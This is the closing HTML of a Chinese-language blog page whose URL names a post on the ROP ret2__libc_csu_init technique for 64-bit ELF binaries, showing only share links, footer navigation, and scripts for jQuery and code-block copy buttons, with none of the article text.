  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&name=&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&t="><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    luyanpei
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
